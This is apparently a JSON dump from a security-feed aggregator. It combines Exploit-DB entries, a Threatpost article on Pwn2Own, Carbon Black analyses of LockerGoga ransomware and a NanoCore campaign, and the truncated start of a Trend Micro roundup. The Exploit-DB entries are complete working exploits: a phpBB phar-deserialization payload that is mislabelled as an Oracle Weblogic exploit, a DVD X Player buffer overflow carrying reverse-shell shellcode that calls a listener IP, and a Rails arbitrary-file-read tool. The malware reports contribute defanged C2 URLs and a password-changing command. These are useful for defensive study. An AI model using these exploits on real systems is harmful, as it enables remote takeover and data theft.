{"exploitdb": [{"lastseen": "2019-03-07T22:40:03", "bulletinFamily": "exploit", "description": "", "modified": "2019-10-25T00:00:00", "published": "2019-10-25T00:00:00", "id": "EDB-ID:46513", "href": "https://www.exploit-db.com/exploits/46513", "type": "exploitdb", "title": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)", "sourceData": "// All greets goes to RIPS Tech\r\n// Run this JS on Attachment Settings ACP page\r\nvar plupload_salt = '';\r\nvar form_token = '';\r\nvar creation_time = '';\r\nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip\r\n// your payload here\r\nvar payload = '<?php __HALT_COMPILER(); ?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf \\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB';\r\nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});\r\nvar sid = (new URL(document.location.href)).searchParams.get('sid');\r\nvar url = '/adm/index.php';\r\nvar getparams = {\r\n 'i': 'acp_database',\r\n 'sid': sid,\r\n 'mode': 'backup'\r\n};\r\n$.get(url, getparams, function(data) {\r\n form_token = $(data).find('[name=\"form_token\"]').val();\r\n creation_time = $(data).find('[name=\"creation_time\"]').val();\r\n if(form_token && creation_time) {\r\n var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';\r\n var postdata = {\r\n 'type': 'data',\r\n 'method': 'text',\r\n 'where': 'download',\r\n 'table[]': 'phpbb_config',\r\n 'submit': 'Submit',\r\n 'creation_time': creation_time,\r\n 'form_token': form_token\r\n }\r\n $.post(posturl.replace(\"|\", sid), postdata, function (data) {\r\n plupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1];\r\n if (plupload_salt) {\r\n filepath = filepath.replace(\"$salt\", plupload_salt);\r\n var postdata = new FormData();\r\n postdata.append('name', 'evil.zip');\r\n postdata.append('chunk', 0);\r\n postdata.append('chunks', 2);\r\n postdata.append('add_file', 'Add the file');\r\n postdata.append('real_filename', 'evil.zip');\r\n // file\r\n var pharfile = new File([byteArray], 'evil.zip');\r\n postdata.append('fileupload', pharfile);\r\n jQuery.ajax({\r\n url: '/posting.php?mode=reply&f=2&t=1',\r\n data: postdata,\r\n cache: false,\r\n contentType: false,\r\n processData: false,\r\n method: 'POST',\r\n success: function(data){\r\n if (\"id\" in data) {\r\n $('#img_imagick').val(filepath).focus();\r\n $('html, body').animate({\r\n scrollTop: ($('#submit').offset().top)\r\n }, 500);\r\n }\r\n }\r\n });\r\n\r\n }\r\n }, 'text');\r\n }\r\n});", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46513"}, {"lastseen": "2019-03-21T15:15:52", "bulletinFamily": "exploit", "description": "", "modified": "2019-03-21T00:00:00", "published": "2019-03-21T00:00:00", "id": "EDB-ID:46584", "href": "https://www.exploit-db.com/exploits/46584", "type": "exploitdb", "title": "DVD X Player 5.5.3 - '.plf' Buffer Overflow", "sourceData": "#!/usr/bin/env python\r\n\r\n# Exploit Title: DVD X Player 5.5.3 Buffer Overflow\r\n# Date: 20.03.2019\r\n# Exploit Author: Paolo Perego - paolo@armoredcode.com\r\n# Vendor Homepage: http://www.dvd-x-player.com\r\n# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe\r\n# Version: 5.5.3.8 and above\r\n# Tested on: Windows 7 Professional SP1 x86\r\n# CVE : CVE-2018-9128\r\n# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 \r\n# In Windows 7, SEH handler to be used contains a \\x00 byte that it has been\r\n# obtained using a restricted char. For such a reason, every jump has to be\r\n# backward on the beginning of attacking shellcode.\r\n\r\n# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\\x00\\x0a\\x1a\\x0d' -f py -v shellcode\r\n\r\nshellcode = \"\"\r\nshellcode += \"\\xb8\\xb8\\xfa\\xed\\xbb\\xda\\xc1\\xd9\\x74\\x24\\xf4\\x5a\"\r\nshellcode += \"\\x33\\xc9\\xb1\\x52\\x31\\x42\\x12\\x03\\x42\\x12\\x83\\x7a\"\r\nshellcode += \"\\xfe\\x0f\\x4e\\x86\\x17\\x4d\\xb1\\x76\\xe8\\x32\\x3b\\x93\"\r\nshellcode += \"\\xd9\\x72\\x5f\\xd0\\x4a\\x43\\x2b\\xb4\\x66\\x28\\x79\\x2c\"\r\nshellcode += \"\\xfc\\x5c\\x56\\x43\\xb5\\xeb\\x80\\x6a\\x46\\x47\\xf0\\xed\"\r\nshellcode += \"\\xc4\\x9a\\x25\\xcd\\xf5\\x54\\x38\\x0c\\x31\\x88\\xb1\\x5c\"\r\nshellcode += \"\\xea\\xc6\\x64\\x70\\x9f\\x93\\xb4\\xfb\\xd3\\x32\\xbd\\x18\"\r\nshellcode += \"\\xa3\\x35\\xec\\x8f\\xbf\\x6f\\x2e\\x2e\\x13\\x04\\x67\\x28\"\r\nshellcode += \"\\x70\\x21\\x31\\xc3\\x42\\xdd\\xc0\\x05\\x9b\\x1e\\x6e\\x68\"\r\nshellcode += \"\\x13\\xed\\x6e\\xad\\x94\\x0e\\x05\\xc7\\xe6\\xb3\\x1e\\x1c\"\r\nshellcode += \"\\x94\\x6f\\xaa\\x86\\x3e\\xfb\\x0c\\x62\\xbe\\x28\\xca\\xe1\"\r\nshellcode += \"\\xcc\\x85\\x98\\xad\\xd0\\x18\\x4c\\xc6\\xed\\x91\\x73\\x08\"\r\nshellcode += \"\\x64\\xe1\\x57\\x8c\\x2c\\xb1\\xf6\\x95\\x88\\x14\\x06\\xc5\"\r\nshellcode += \"\\x72\\xc8\\xa2\\x8e\\x9f\\x1d\\xdf\\xcd\\xf7\\xd2\\xd2\\xed\"\r\nshellcode += \"\\x07\\x7d\\x64\\x9e\\x35\\x22\\xde\\x08\\x76\\xab\\xf8\\xcf\"\r\nshellcode += \"\\x79\\x86\\xbd\\x5f\\x84\\x29\\xbe\\x76\\x43\\x7d\\xee\\xe0\"\r\nshellcode += \"\\x62\\xfe\\x65\\xf0\\x8b\\x2b\\x29\\xa0\\x23\\x84\\x8a\\x10\"\r\nshellcode += \"\\x84\\x74\\x63\\x7a\\x0b\\xaa\\x93\\x85\\xc1\\xc3\\x3e\\x7c\"\r\nshellcode += \"\\x82\\x2b\\x16\\x46\\x38\\xc4\\x65\\xb6\\xad\\x48\\xe3\\x50\"\r\nshellcode += \"\\xa7\\x60\\xa5\\xcb\\x50\\x18\\xec\\x87\\xc1\\xe5\\x3a\\xe2\"\r\nshellcode += \"\\xc2\\x6e\\xc9\\x13\\x8c\\x86\\xa4\\x07\\x79\\x67\\xf3\\x75\"\r\nshellcode += \"\\x2c\\x78\\x29\\x11\\xb2\\xeb\\xb6\\xe1\\xbd\\x17\\x61\\xb6\"\r\nshellcode += \"\\xea\\xe6\\x78\\x52\\x07\\x50\\xd3\\x40\\xda\\x04\\x1c\\xc0\"\r\nshellcode += \"\\x01\\xf5\\xa3\\xc9\\xc4\\x41\\x80\\xd9\\x10\\x49\\x8c\\x8d\"\r\nshellcode += \"\\xcc\\x1c\\x5a\\x7b\\xab\\xf6\\x2c\\xd5\\x65\\xa4\\xe6\\xb1\"\r\nshellcode += \"\\xf0\\x86\\x38\\xc7\\xfc\\xc2\\xce\\x27\\x4c\\xbb\\x96\\x58\"\r\nshellcode += \"\\x61\\x2b\\x1f\\x21\\x9f\\xcb\\xe0\\xf8\\x1b\\xf5\\x11\\x30\"\r\nshellcode += \"\\xb6\\x62\\x88\\xa1\\xfb\\xee\\x2b\\x1c\\x3f\\x17\\xa8\\x94\"\r\nshellcode += \"\\xc0\\xec\\xb0\\xdd\\xc5\\xa9\\x76\\x0e\\xb4\\xa2\\x12\\x30\"\r\nshellcode += \"\\x6b\\xc2\\x36\"\r\n\r\njunk = \"\\x90\" * (600 -len(shellcode))\r\njunk += shellcode\r\n\r\n# nasm > jmp $-400\r\n# 00000000 E96BFEFFFF jmp 0xfffffe70\r\nbackflip=\"\\x90\\x90\\x90\\xE9\\x6B\\xFE\\xFF\\xFF\"\r\njunk += backflip\r\n\r\n# 00401838 |. 5E POP ESI\r\njunk += \"\\xeb\\xf6\\x90\\x90\"\r\njunk += \"\\x38\\x18\\x40\\x1a\"\r\n\r\nfile = open(\"evil_playlist.plf\", \"w\")\r\nfile.write(junk)\r\nfile.close()", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46584"}, {"lastseen": "2019-03-21T15:15:52", "bulletinFamily": "exploit", "description": "", "modified": "2019-03-21T00:00:00", "published": "2019-03-21T00:00:00", "id": "EDB-ID:46585", "href": "https://www.exploit-db.com/exploits/46585", "type": "exploitdb", "title": "Rails 5.2.1 - Arbitrary File Content Disclosure", "sourceData": "'''\r\nExploit Title: File Content Disclosure on Rails\r\nDate: CVE disclosed 3/16 today's date is 3/20\r\nExploit Author: NotoriousRebel\r\nVendor Homepage: https://rubyonrails.org/\r\nSoftware Link: https://github.com/rails/rails\r\nVersion: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1\r\nTested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)\r\nCVE: 2019-5418\r\n'''\r\nimport sys\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print('\\n\\033[93m[!] Requests library not found, please install before proceeding.\\n\\n \\033[0m')\r\n sys.exit(1)\r\n\r\n\r\ndef banner():\r\n banner = \"\"\"\r\n ----------------------------------------------\r\n Arbitrary Traversal exploit for Ruby on Rails\r\n CVE-2019-5418\r\n ----------------------------------------------\r\n \"\"\"\r\n print(banner)\r\n\r\ndef check_args():\r\n if len(sys.argv) != 2:\r\n print(\"Invalid number of arguments entered!\")\r\n how_to_use = \"python3 Bandit.py url\"\r\n print('Use as:', how_to_use)\r\n sys.exit(1)\r\n\r\n\r\ndef check_url(url):\r\n status_code = requests.get(url)\r\n if status_code != 200:\r\n print(\"Url is invalid or can not be reached!\")\r\n sys.exit(1)\r\n\r\n\r\ndef read_file(url, file):\r\n headers = {'Accept': file + '{{'}\r\n req = requests.get(url, headers=headers)\r\n return req\r\n\r\n\r\ndef main():\r\n banner()\r\n check_args()\r\n url = sys.argv[1]\r\n while True:\r\n try:\r\n file = input(\"Enter file to read (enter quit to exit): \")\r\n except Exception:\r\n file = raw_input(\"Enter file to read (enter quit to exit): \")\r\n try:\r\n if file.lower() == 'quit':\r\n break\r\n except Exception:\r\n if file == 'quit':\r\n break\r\n response = read_file(url, file)\r\n print(response.text)\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n print('\\n\\n\\033[93m[!] ctrl+c detected from user, quitting.\\n\\n \\033[0m')", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46585"}], "threatpost": [{"lastseen": "2019-03-22T21:04:03", "bulletinFamily": "info", "description": "Hackers took down the Mozilla Firefox and Microsoft Edge browsers on Thursday at Pawn2Own, the annual hacking conference held in tandem with CanSecWest, as the competition continued for a second day.\n\nThe dynamic hacking duo of Amat Cama and Richard Zhu, which make up team [Fluoroacetate](<https://www.twitter.com/fluoroacetate>), had another good day, following [Wednesday\u2019s successes](<https://threatpost.com/hackers-take-down-safari-vmware-and-oracle-at-pwn2own/143042/>). The two trained their skills first on Mozilla Firefox, leveraging a JIT bug in the browser, followed up by an out-of-bounds write exploit in the Windows kernel. The one-two punch allowed Fluoroacetate to take over the targeted system.\n\n\u201cThey were able to execute code at SYSTEM level just by using Firefox to visit their specially crafted website,\u201d wrote Zero Day Initiative in a [write-up of the day\u2019s hacking results](<https://www.zerodayinitiative.com/blog/2019/3/21/pwn2own-vancouver-2019-day-two-results>). For their efforts the two earned $50,000.\n\n> The [@fluoroacetate](<https://twitter.com/fluoroacetate?ref_src=twsrc%5Etfw>) duo does it again. They used a type confusion in [#Edge](<https://twitter.com/hashtag/Edge?src=hash&ref_src=twsrc%5Etfw>), a race condition in the kernel, then an out-of-bounds write in [#VMware](<https://twitter.com/hashtag/VMware?src=hash&ref_src=twsrc%5Etfw>) to go from a browser in a virtual client to executing code on the host OS. They earn $130K plus 13 Master of Pwn points. [pic.twitter.com/mD13kozJLv](<https://t.co/mD13kozJLv>)\n> \n> \u2014 Zero Day Initiative (@thezdi) [March 21, 2019](<https://twitter.com/thezdi/status/1108812191996628992?ref_src=twsrc%5Etfw>)\n\nThe story of the day continued to be Cama and Zhu, who earned an additional $130,000 for a \u201cmasterfully crafted exploit chain\u201d that eventually lead to the owning the underlying hypervisor of a VMware Workstation, ZDI reported.\n\nThat hack began on VMware Workstation where Fluoroacetate opened an Edge browser and visited a booby-trapped website that contained a confusion bug. Next, Cama and Zhu used a race condition in the Windows kernel followed by an out-of-bounds write in VMware workstation that linked to executing code on the underlying hypervisor.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/22160235/Pwn2own-2019-day-two-2.png>)\n\nArthur Gerkis of Exodus Intelligence\n\nAdding both day\u2019s awards together, Fluoroacetate has so far earned $340,000 in the Pawn2Own competition this year.\n\nMozilla\u2019s Firefox browser went down a second time Thursday, thanks to hacker Niklas Baumstark. He was able to execute code at the system level of a PC by leveraging a JIT bug in Firefox.\n\n\u201cIn a real-world scenario, an attacker could use this to run their code on a target system at the level of the logged-on user,\u201d ZDI wrote. The successful exploit earned Baumstark $40,000.\n\nA researcher named Arthur Gerkis, with Exodus Intelligence, was the final contestant and a newcomer to the Pwn2Own competition. His target was also Microsoft\u2019s Edge browser. \u201c[Gerkis] wasted no time by using a double free bug in the renderer followed by a logic bug to bypass the sandbox,\u201d ZDI wrote. For his effort, the researcher earned $50,000.\n\nDay three of the competition closes out the Pawn2Own event with a automotive category.\n", "modified": "2019-03-22T16:28:41", "published": "2019-03-22T16:28:41", "id": "THREATPOST:2765AB7FFF03EDA0A1598E5DE31A3AD8", "href": "https://threatpost.com/firefox-edge-pwn2own/143082/", "type": "threatpost", "title": "Firefox and Edge Fall to Hackers on Day Two of Pwn2Own", "cvss": {"score": 0.0, "vector": "NONE"}}], "carbonblack": [{"lastseen": "2019-03-22T17:12:15", "bulletinFamily": "blog", "description": "LockerGoga ransomware has recently surfaced with a few successful infections mostly discovered in Europe that have caused very large and notable damage to businesses. This ransomware uses Windows \u201cliving off the land\u201d tools (LOLBins) for the most part in order to infect and encrypt the victim\u2019s machine.\n\nDetails\n\nLockerGoga is delivered as a digitally signed executable but with a currently revoked certificate by ALISA Ltd, as shown below.\n\n__\n\nWhen the LockerGoga executable launcher is first started it spawns a command prompt process in order to execute the following command, which subsequently copies itself appearing as a new file with a semi-randomly generated name in the user\u2019s %TEMP% directory. The file is named \u201c**tgytutrc(ID).exe**\u201d, where the (ID) is a 4-digit random value.\n\n**C:\\Windows\\system32\\cmd.exe /c move /y C:\\Users\\<user>\\Desktop\\LockerGoga.exe C:\\Users\\<user>\\AppData\\Local\\Temp\\tgytutrc(ID).exe**\n\nLockerGoga writes a new registry key under \u201c**HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\\\{SID}\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe**\u201d. This registry location is used by the Windows Background Activity Monitor (as indicated by \u201cbam\u201d in the registry path) to monitor background applications as well as their respective last date/time of execution. It then unpacks the following binary and executes it using the \u201c-m\u201d switch, and then deletes the original launcher. This command line will appear as:\n\n**C:\\Users\\<user>\\AppData\\Local\\Temp\\tgytutrc(ID).exe -m**\n\nAt this stage, you might be quick enough to notice the ransom note placed on the desktop before the user session is logged out, but in case not, here is the exact ransom note below.\n\n__\n\nImmediately after it runs the standard Windows \u201c**logoff.exe <sessionID>**\u201d (where the session ID may vary from environment to the next) command from the C:\\Windows\\System32 directory. The Windows Net.exe utility will change the Administrator password with the following command:\n\n**n\u200bet\u200b.e\u200bxe user Administrator HuHuHUHoHo283283@dJD**\n\nA new child process is created as \u201c**tg\u200byt\u200but\u200brc\u200b(ID)\u200b.e\u200bxe -i SM-tgytutrc**\u201d, which is used to encrypt a single file on the drive. Once a file has been encrypted, the child process exits, and a new one is created for each file encountered. When each file is encrypted, registry keys are created under **HKU\\\\{SID}\\Software\\Microsoft\\RestartManager\\** which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash.\n\nBehavioral Summary\n\nAs far as ransomware goes, LockerGoga is an extremely noisy example. Not only is there the behavior of each file being encrypted but, unusually, the malware will launch a child process for each and every file to be encrypted. This will result in a single executable launched tens of thousands of times in quick succession.\n\nWe also see Windows components of net.exe and logoff.exe used to lock the user out of the system after encryption. The use of **net.exe** to change a user\u2019s password, especially that of the Administrator account, is explicitly unusual and should be monitored for.\n\nThe overall TTP\u2019s for the LockerGoga launcher and the child process created are shown below.\n\n____\n\n__\n\nBelow is the process diagram showing the high level overview of LockerGoga.\n\n\n\nIf you are a Carbon Black customer and looking for more information on how CB products defend against this attack, [click here. ](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-LockerGoga-Ransomware/ta-p/69388>)\n\nRemediation:\n\n**MITRE ATT&CK TIDs **\n\nTID\n\n| \n\nTactic\n\n| \n\nDescription \n \n---|---|--- \n \n[T1112](<https://attack.mitre.org/techniques/T1112/>)\n\n| \n\nDefense Evasion\n\n| \n\nModify Registry \n \n[T1059](<https://attack.mitre.org/techniques/T1059/>)\n\n| \n\nExecution\n\n| \n\nCommand-Line Interface \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| \n\nDiscovery\n\n| \n\nAccount Discovery \n \n[T1057](<https://attack.mitre.org/techniques/T1057/>)\n\n| \n\nDiscovery\n\n| \n\nProcess Discovery \n \n \n\nIndicators of Compromise (IOCs)\n\nIndicator\n\n| \n\nType\n\n| \n\nContext \n \n---|---|--- \n \nc97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15\n\n \n\ne11502659f6b5c5bd9f78f534bc38fea\n\n| \n\nSHA256\n\n \n\nMD5\n\n| \n\nLockerGoga launcher executable \n \n65d5dd067e5550867b532f4e52af47b320bd31bc906d7bf5db889d0ff3f73041\n\n \n\n438ebec995ad8e05a0cea2e409bfd488\n\n| \n\nSHA256\n\n \n\nMD5\n\n| \n\nLockerGoga launcher executable \n \n88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f\n\n \n\nc2da604a2a469b1075e20c5a52ad3317\n\n| \n\nSHA256\n\n \n\nMD5\n\n| \n\nLockerGoga launcher executable \n \n \n\nThe post [TAU Threat Intelligence Notification - LockerGoga Ransomware](<https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "modified": "2019-03-22T15:32:14", "published": "2019-03-22T15:32:14", "id": "CARBONBLACK:5EC003A7318B54698D2F173E1C55CF2F", "href": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/", "type": "carbonblack", "title": "TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-20T21:05:12", "bulletinFamily": "blog", "description": "In analyzing the stream of raw emails seen in the wild, TAU discovered a campaign of what first appeared to be a fairly standard spear-phishing attack. The email contained a Word document which carried an exploit for [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>), a vulnerability that allows for Microsoft Office documents to run arbitrary code. This exploit is [nothing new](<https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/>), and Microsoft released a patch for this back in late 2017. This particular CVE exploits a memory corruption issue in the Equation Editor, found in certain versions of Microsoft Office. Successful exploitation of this vulnerability can lead to remote code execution on a vulnerable system. Nevertheless, we continued on with the investigation by pivoting on this particular Microsoft Word document, to then discover ten recent similar Word documents submitted to VirusTotal a total of 17 times within a four-day period in February. Out of the seventeen submissions, the majority were submitted from Italy, Czech Republic, Germany, Ukraine, United Kingdom and Austria. There were two that were submitted from the U.S, and one that was submitted from the United Arab Emirates.\n\nBehavioral Summary\n\nWhile this attack is based upon a malicious Word document, we can see the attack behavior take place using legitimate Windows applications such as the Office Equation Editor, an application used to generate complex mathematical equations. Equation Editor has a well-known vulnerability that is used in this instance to reach out to multiple online sites to download additional payloads. This behavior is tracked, as shown in the process tree below. The overall characteristics of the attack are also notable based upon the various TTPs used, also shown below in the alert summary.\n\n__\n\n\n\nDetails\n\nWhen the email attachment is opened, the Equation Editor process (**Eqnedt32.exe**) spawns under **svchost.exe** signifying the successful execution of the exploit embedded in the Word document. It then immediately calls out to a remote web address **hxxp://sunrypero.cf **and downloads a JPG file called **1126rjduu76.jpg**. (At the time this sample was detonated, this domain name was live. The domain had been registered with Freenom and used the top-level domain \u201c.cf\u201d, which was originally created for use by the Central African Republic). Despite hosting a Word document and 2 JPG graphic files at the sunrypero.cf domain, the JPG files were in fact found to be PE files.\n\n__\n\nOnce the particular JPG file is downloaded, it is saved into the users **%temp%** folder as \u201c**tryui.exe**\u201d. The icon for this file is shown below.\n\n__\n\nOddly, the actor(s) didn\u2019t include any error handling in their code, so if a HTTP request cannot be established, then the error message box (shown below) is displayed shortly after the Word document is opened.\n\n__\n\nA quick glance at the tryui.exe file returned the following string which pertains to the software known as AutoHotKey, version 1.1.23.00.\n\n__\n\nTaken from their [website](<https://www.autohotkey.com/>), \u201c_AutoHotkey is a free, open-source scripting language for Windows that allows users to easily create small to complex scripts for all kinds of tasks such as: form fillers, auto-clicking, macros, etc_\u201d.\n\nMalware that exploits AutoHotKey isn\u2019t a new concept, and a quick search returned a tool written by Amit Serper called [ahk-dumper](<https://github.com/aserper/ahk-dumper>). This tool essentially dumps out the script from the RDATA section of the PE file. When run against the **tryui.exe** file it presented 143 lines of code (thank you Amit!). The code can be broken down into the following pieces:\n\n 1. Uses RegExReplace to hide the string \u201cCallWindowProc\u201d used by \u201cUser32.dll\u201d\n 2. Uses RegExReplace to hide the string showing a hard-coded path for the Microsoft Regasm utility at\u201cC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe\u201d\n 3. Uses \u201cInternetGetConnectedState\u201d used by \u201cwininet.dll\u201d to obtain a network connection, otherwise sleep for 1 second and retry\n 4. Create a COM object using \u201cWinHttpRequest.5.1\u201d in order to get the payload found at either hxxps://share.dmca.gripe/bNdw3tI5XtihAdic.jpg or hxxps://paste.ee/r/KyH5C\n 5. Copy downloaded file(s) into the user\u2019s %Temp% folder\n 6. Create file shortcut in Startup folder, and set file attributes to System, Hidden, ReadOnly\n\nThe last part is the base64 decoding routine, which uses a combination of the RegexReplace and Flip functions as shown below. The flip function simply reverses the order of the given string. The ltrim and rtrim trims characters either from the beginning (left) or end (right) of the string.\n\n\n\nPart of the base64 routine is shown below.\n\n\n\nIn other words, when the tryui.exe file runs, it downloads a base64 encoded string from hxxps://paste.ee/r/KyH5C address (which is a site that offers similar features to PasteBin), as well as another site which was temporarily used to host a second JPG file at hxxps://share.dmca.gripe/bNdw3tI5XtihAdic.jpg. Using the two separate base64 encoded strings, it compiles a binary which is then used to install and register the C2 and keylogger component.\n\n\n\nAs long as the Regasm.exe tool is found in the hard coded path shown above, the tryui.exe will invoke regasm and use it to merge the two base64 encoded strings in order to form a separate executable file. It places what appears to be a legitimate Regasm binary disguised as natmon.exe into the locations listed below for persistence. Comparing similar files suggests that this has been used to avoid detection.\n\nKey\n\n| \n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\NAT Monitor\\ \n \n---|--- \n \nName\n\n| \n\nNAT Monitor \n \nValue\n\n| \n\nC:\\Program Files (x86)\\NAT Monitor\\natmon.exe \n \nThe final part of the attack turns out to be the delivery of the NanoCore trojan which includes keylogger, which originally communicated back to it\u2019s C2 located in the Netherlands over an unencrypted channel over TCP port 2960. Shortly after testing this particular sample, the bad actor(s) soon updated their C2 to use SSL over TCP port 443 in order to hide the data sent to and from the C2 server.\n\n**Side note:**\n\nAs the path for Regasm.exe is hard coded within the AutoHotKey script, if Regasm.exe is not present in the same path, the malware will not run any further. However, copying a newer version of .NET\u2019s Regasm.exe from a more recent folder path e.g. \"C:\\Windows\\Microsoft.NET\\Framework\\**v4.x**\", permits **tryui.exe** to launch Regasm and register an application.\n\nWhile none of the above techniques are necessarily new, it is interesting to see how AutoHotKey continues to grow in popularity amongst malware authors, and how malicious scripts embedded within the legitimate AutoHotKey compiled binary are becoming more sophisticated in order to attempt to fly under the radar of modern day detection and prevention security products.\n\nIf you are a Carbon Black customer and looking for more information on how CB products defend against this attack, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-NanoCore-Old-Malware-New-Tricks/ta-p/69286#M2641>)\n\nRemediation:\n\n**MITRE ATT&CK TIDs **\n\nTID\n\n| \n\nTactic\n\n| \n\nDescription \n \n---|---|--- \n \n[T1204](<https://attack.mitre.org/techniques/T1204/>)\n\n| \n\nExecution\n\n| \n\nUser execution via opening of email attachment \n \n[T1027](<https://attack.mitre.org/techniques/T1027/>)\n\n| \n\nDefense Evasion\n\n| \n\nObfuscated files or information \n \n[T1121](<https://attack.mitre.org/techniques/T1121/>)\n\n| \n\nDefense Evasion, Execution\n\n| \n\nProxying of code execution through Regasm \n \n[T1203](<https://attack.mitre.org/techniques/T1203/>)\n\n| Execution | Exploitation for Client Execution \n \n[T1036](<https://attack.mitre.org/techniques/T1036/>)\n\n| \n\nDefense Evasion\n\n| \n\nMasquerading \n \n[T1060](<https://attack.mitre.org/techniques/T1060/>)\n\n| Persistence | Registry Run Keys / Startup Folder \n \n[T1121](<https://attack.mitre.org/techniques/T1121/>)\n\n| Defense Evasion, Execution | Regsvcs/Regasm \n \nIndicators of Compromise (IOCs)\n\nIndicator\n\n| \n\nType\n\n| \n\nContext \n \n---|---|--- \n \n88334ec58de64e4a174dbf8b7027f916\n\ncfea6ae1730a9dd580e2d5b633f1785357d50af8e07768081b3f50139144259b\n\n| \n\nMD5\n\nSHA256\n\n| \n\nQuotation_Sheet_#RFQ190207.doc Word Document \n \n20bc6c4211538b4eb7a756cfafeb0c39\n\n3c32a519c6ea39670cb610a190cdcf3acd9a7e00b11d93d05d7395a2de0bb1ff\n\n| \n\nMD5\n\nSHA256\n\n| \n\nTryui.exe \n \n780492fd6099b8e29fb10b454a1d7b13\n\n391276372a25e0c0b5a4650d6454dbea85cc2e941970a2ccd7a42323b7e82141\n\n| \n\nMD5\n\nSHA256\n\n| \n\nNanocore \n \nhxxp://sunrypero.cf\n\n| \n\nURL\n\n| \n\nC2 \n \nhxxps://paste.ee/r/KyH5C\n\n| \n\nURL\n\n| \n\nC2 \n \nhxxps://share.dmca.gripe\n\n| \n\nURL\n\n| \n\nC2 \n \n185.244.30.106\n\n| \n\nIP\n\n| \n\nC2 \n \nThe post [TAU Threat Intelligence Notification: NanoCore - Old Malware, New Tricks!](<https://www.carbonblack.com/2019/03/20/tau-threat-intelligence-notification-nanocore-old-malware-new-tricks/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "modified": "2019-03-20T19:14:15", "published": "2019-03-20T19:14:15", "id": "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "href": "https://www.carbonblack.com/2019/03/20/tau-threat-intelligence-notification-nanocore-old-malware-new-tricks/", "type": "carbonblack", "title": "TAU Threat Intelligence Notification: NanoCore \u2013 Old Malware, New Tricks!", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2019-03-22T15:11:42", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how radio frequency technology is putting industrial organizations at risk. Also, understand the threat landscape of telecommunications and how to prepare for future threats.\n\nRead on:\n\n[**How Radio Frequency Technology is Putting the Industrial Sector at Risk**](<https://blog.trendmicro.com/how-radio-frequency-technology-is-putting-the-industrial-sector-at-risk/>)\n\n_Leaders of industrial organizations must understand that the devices and systems employees leverage to control 